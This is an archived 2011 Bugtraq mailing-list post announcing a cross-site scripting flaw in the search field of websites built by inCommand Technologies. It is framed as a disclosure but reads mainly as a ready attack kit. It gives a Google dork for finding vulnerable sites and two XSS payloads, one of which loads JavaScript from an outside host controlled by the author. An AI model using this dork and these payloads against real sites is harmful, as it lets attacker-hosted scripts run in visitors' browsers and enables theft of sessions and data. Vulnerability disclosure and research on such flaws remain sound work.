lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201110210947.p9L9lIkt015202@sf01web1.securityfocus.com>
Date: Fri, 21 Oct 2011 09:47:18 GMT
From: md.r00t.defacer@...il.com
To: bugtraq@...urityfocus.com
Subject: inCommand Technologies, Inc. Cross-site Scripting Vulnerability

#------------In The Name Of God------------
#inCommand Technologies, Inc. Cross-site Scripting Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@...il.com
#Website: www.r00t.gigfa.com
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:
# "Website Design by inCommand Technologies, Inc."
###################################
# xss EXPLOIT:
<script>alert(/0/)</script>
<script src="http://md-r00t.persiangig.com/xpl/XSS1.JS"></script>
######VULN IN HERE##################
Vulnerabilities in the search field located ;)
####################################
#TNX:
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)
***************************************

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ